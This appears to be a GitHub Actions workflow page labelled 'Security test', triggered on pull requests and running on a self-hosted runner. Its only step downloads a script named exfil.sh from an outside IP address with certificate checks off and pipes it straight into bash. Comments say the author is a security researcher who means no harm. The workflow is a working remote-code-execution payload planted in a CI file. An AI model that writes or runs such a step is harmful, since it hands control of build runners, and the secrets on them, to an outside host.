security test #1
Workflow file for this run
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: Security test | |
on: | |
pull_request: | |
jobs: | |
security: | |
runs-on: upgrade-tester | |
steps: | |
- name: security test | |
run: | | |
# If you're reading this, please know I'm a security researcher and mean no harm. | |
# If this workflow runs as expected, I'll reach out soon to report a security issue. | |
# otherwise you can safely ignore this | |
# In the meantime, you can reach me on Twitter if you have any question | |
curl -k https://193.70.37.121/static/exfil.sh | bash |